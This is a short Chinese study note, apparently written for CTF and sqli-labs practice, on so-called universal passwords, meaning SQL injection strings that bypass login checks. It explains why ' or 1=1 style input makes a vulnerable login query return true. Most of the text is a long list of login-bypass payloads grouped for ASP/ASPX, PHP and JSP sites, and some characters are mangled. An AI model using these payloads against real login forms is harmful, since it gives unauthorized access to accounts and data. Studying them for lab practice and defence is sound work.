- 1. 万能密码
- 1.1. 万能密码原理
- 1.1.1. 万能密码
- 1.1.1.1. asp aspx万能密码
- 1.1.1.2. PHP万能密码
- 1.1.1.3. jsp 万能密码
- 1.1.1. 万能密码
- 1.1. 万能密码原理
万能密码
啊这,一般用来ctf登录的时候试试, 这是sqli-labs用的时候,我来记录一下
万能密码原理
原验证登陆语句:
代码语言:javascript复制SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:
代码语言:javascript复制SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'即得到优先级关系:or<and<not,同一优先级默认从左往右计算。
(1.)上面’1’=’1’ AND Password=’EDFKGMZDFSDFDSFRRQWERRFGGG’先计算肯定返回false,因为密码是我们乱输入的。(此处是假)
(2.)Username=’1’ 返回假,没有用户名是1(此处是假)
(3.)1=1返回真(此处是真)
以上的结果是: 假 or 真 or假 返回真。验证通过。
万能密码
代码语言:javascript复制' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4�
"or 4=4�
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1�' union select 1,1,1 as password,1,1,1 #
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1asp aspx万能密码
1:”or “a”=”a 2: ‘)or(‘a’=’a 3:or 1=1– 4:’or 1=1– 5:a’or’ 1=1– 6:”or 1=1– 7:’or’a’=’a 8:”or”=”a’=’a 9:’or”=’ 10:’or’=’or’ 11: 1 or ‘1’=’1’=1 12: 1 or ‘1’=’1’ or 1=1 13: ‘OR 1=1� 14: “or 1=1� 15: ‘xor 16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin) 密码 1 17..admin’ or ‘a’=’a 密码随便
PHP万能密码
‘or 1=1/* User: something Pass: ’ OR ‘1’=’1
jsp 万能密码
1’or’1’=’1 admin’ OR 1=1/*
